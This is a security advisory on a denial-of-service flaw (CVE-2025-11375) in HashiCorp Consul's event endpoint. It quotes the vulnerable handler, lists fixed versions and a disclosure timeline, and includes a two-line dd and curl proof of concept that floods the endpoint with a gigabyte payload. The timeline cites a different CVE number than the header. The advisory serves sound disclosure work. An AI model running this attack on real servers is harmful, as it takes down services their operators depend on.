Get in touch

HashiCorp Consul <= 1.21.5 Event Denial of Service

Nov 2, 2025 · By Julien Ahrens

ADVISORY INFORMATION

Product: HashiCorp Consul
Vendor URL: https://developer.hashicorp.com/consul
CWE: Memory Allocation with Excessive Size Value [CWE-789]
Date found: 2025-09-19
Date published: 2025-11-02
CVSSv4 Score: 7.1 (CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N)
CVE: CVE-2025-11375

VERSIONS AFFECTED

Consul Community Edition <= 1.21.5
Consul Enterprise <= 1.21.5, 1.20.7, 1.19.9 and 1.18.11

INTRODUCTION

Consul is a service networking solution that enables teams to manage secure network connectivity between services, across on-prem, hybrid cloud, and multi-cloud environments and runtimes. Consul offers service discovery, service mesh, identity-based authorization, L7 traffic management, and secure service-to-service encryption.

(from the vendor’s homepage)

VULNERABILITY DETAILS

Consul’s event endpoint at “/v1/event/fire/” is vulnerable to denial of service condition. The handler reads the request body into memory without imposing a limit on the Content‑Length:

// Get the payload
if req.ContentLength > 0 {
    var buf bytes.Buffer
    if _, err := io.Copy(&buf, req.Body); err != nil {
        return nil, err
    }
    event.Payload = buf.Bytes()
}

Because the server trusts the client‑supplied Content‑Length, an attacker who can authenticate to the API can send a request with an arbitrarily large body. Consul will allocate a buffer proportional to the incoming data, eventually exhausting the process’ memory and causing Consul to crash or become unresponsive.

Successful exploits can allow an authenticated attacker to crash the Consul service.

PROOF OF CONCEPT

dd if=/dev/urandom bs=1M count=1000 of=/tmp/event_payload.bin
curl --http1.1 -X PUT --data-binary @/tmp/event_payload.bin http://[address]:8500/v1/event/fire/test

SOLUTION

Update Consul Community to version 1.22.0
Update Consul Enterprise to 1.22.0, 1.21.6, 1.20.8 or 1.18.12

REPORT TIMELINE

  • 2025-09-19: Discovery of the vulnerability
  • 2025-09-19: Contacted the vendor via their security@ address
  • 2025-09-22: Vendor sends initial response
  • 2025-09-24: Vendor confirms the vulnerability
  • 2025-10-06: RCE Security asks for the estimated patch date
  • 2025-10-06: Vendor responds stating they want to ship fixes in the 1.22.0 release
  • 2025-10-06: Vendor (CNA) assigns CVE-2025-11374
  • 2025-10-15: Vendor sends another update stating the release is planned for 27th Oct
  • 2025-10-27: Vendor publishes updates that fix the vulnerability
  • 2025-11-02: Full Disclosure

REFERENCES

https://discuss.hashicorp.com/t/hcsec-2025-28-consuls-event-endpoint-is-vulnerable-to-denial-of-service/76723